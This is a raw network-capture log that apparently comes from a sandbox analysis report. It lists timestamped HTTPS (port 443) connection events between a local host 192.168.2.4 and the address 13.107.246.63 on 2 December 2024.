                                                          Dec 2, 2024 17:56:40.347563028 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.347568035 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.350399971 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.350441933 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.350514889 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.350653887 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.350672007 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.240428925 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.246078968 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.246102095 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.246526957 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.246532917 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.400582075 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.400989056 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.401014090 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.401390076 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.401396990 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.419142008 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.419543028 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.419564962 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.419922113 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.419926882 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.682774067 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.682832956 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.682887077 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.683024883 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.683044910 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.683054924 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.683058977 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.687374115 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.687411070 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.687488079 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.687640905 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.687654018 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.844795942 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.844867945 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.845005035 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.845221996 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.845237970 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.845253944 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.845259905 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.849176884 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.849222898 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.849291086 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.849426985 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.849443913 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.873610973 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.874195099 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.874218941 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.875498056 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.875504017 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.925523996 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.925586939 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.925633907 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.925772905 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.925785065 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.925793886 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.925796986 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.928940058 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.928965092 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:41.929020882 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.929333925 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:41.929349899 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.302725077 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.303379059 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.303410053 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.304797888 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.304802895 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.456686020 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.456707954 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.456765890 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.456908941 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.457175016 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.457206011 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.457222939 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.457230091 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.461385012 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.461411953 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.461505890 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.461677074 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.461693048 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.757170916 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.757242918 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.757324934 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.757489920 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.757507086 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.757517099 CET49853443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.757522106 CET4434985313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.759921074 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.759942055 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:42.760061026 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.760188103 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:42.760198116 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.487199068 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.487888098 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.487914085 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.489254951 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.489259958 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.709461927 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.710514069 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.710546017 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.711877108 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.711884975 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.762202024 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.763114929 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.763134003 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.764378071 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.764384985 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.922539949 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.922604084 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.922738075 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.923057079 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.923075914 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.923096895 CET49854443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.923103094 CET4434985413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.930479050 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.930502892 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:43.930574894 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.930773973 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:43.930785894 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.161866903 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.161894083 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.161950111 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.162071943 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.162071943 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.162204981 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.162224054 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.162235022 CET49855443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.162240982 CET4434985513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.165306091 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.165400982 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.165483952 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.165613890 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.165623903 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.204521894 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.204556942 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.204706907 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.204720020 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.204765081 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.204838991 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.204843044 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.204860926 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.205023050 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.205056906 CET4434985613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.205091953 CET49856443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.208647013 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.208687067 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.208746910 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.208872080 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.208885908 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.241502047 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.242048979 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.242084026 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.243376970 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.243382931 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.630657911 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.631289959 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.631325006 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.632642031 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.632647038 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691036940 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691056013 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691173077 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.691199064 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691680908 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.691698074 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691706896 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.691834927 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691863060 CET4434985713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.691907883 CET49857443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.695693970 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.695748091 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:44.695825100 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.695996046 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:44.696010113 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.085093021 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.088701963 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.088754892 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.088803053 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.088818073 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.088825941 CET49858443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.088829994 CET4434985813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.091383934 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.091428041 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.091500998 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.091644049 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.091655016 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.722635984 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.723428965 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.723470926 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:45.723907948 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:45.723913908 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.004940987 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.005574942 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.005604029 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.005987883 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.005994081 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.015595913 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.015990973 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.016016960 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.016410112 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.016416073 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.167495966 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.170505047 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.170567036 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.170609951 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.170609951 CET49859443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.170630932 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.170641899 CET4434985913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.173130035 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.173162937 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.173368931 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.173368931 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.173397064 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.450164080 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.453123093 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.453221083 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.453388929 CET49861443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.453416109 CET4434986113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.458753109 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.458803892 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.458965063 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.459078074 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.459095001 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.474426031 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.477396965 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.477452040 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.477490902 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.477504969 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.477515936 CET49860443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.477520943 CET4434986013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.480711937 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.480735064 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.480865955 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.481235981 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.481246948 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.484294891 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.484947920 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.484957933 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.485375881 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.485380888 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.958404064 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.958868980 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.958904028 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:46.959336042 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:46.959341049 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.088851929 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.088901997 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.088957071 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.089135885 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.089155912 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.089165926 CET49862443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.089170933 CET4434986213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.093885899 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.093914986 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.094024897 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.094451904 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.094466925 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.422982931 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.423046112 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.423098087 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.423257113 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.423278093 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.423288107 CET49863443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.423294067 CET4434986313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.425829887 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.425868034 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:47.425947905 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.426098108 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:47.426111937 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.114900112 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.115410089 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.115431070 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.115869999 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.115875959 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.285613060 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.286045074 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.286086082 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.286510944 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.286515951 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.363162994 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.363610983 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.363635063 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.364061117 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.364065886 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.568799973 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.571749926 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.571810961 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.571878910 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.571892977 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.571902990 CET49864443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.571907997 CET4434986413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.574306965 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.574352980 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.574421883 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.574554920 CET49869443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.574570894 CET4434986913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.721313953 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.724530935 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.724595070 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.724647045 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.724647999 CET49865443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.724669933 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.724683046 CET4434986513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.727220058 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.727256060 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.727329969 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.727466106 CET49870443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.727479935 CET4434987013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.819309950 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.822508097 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.822568893 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.822621107 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.822633028 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.822644949 CET49866443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.822649002 CET4434986613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.824667931 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.824708939 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.824803114 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.824965000 CET49871443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.824978113 CET4434987113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.940422058 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.940890074 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.940920115 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:48.941243887 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:48.941251993 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.244534016 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.245011091 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.245042086 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.245436907 CET49868443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.245441914 CET4434986813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.393932104 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.397286892 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.397360086 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.397407055 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.397423029 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.397433996 CET49867443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.397439003 CET4434986713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.399699926 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.399723053 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.399782896 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.399903059 CET49872443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:49.399915934 CET4434987213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:49.691369057 CET4434986813.107.246.63192.168.2.4
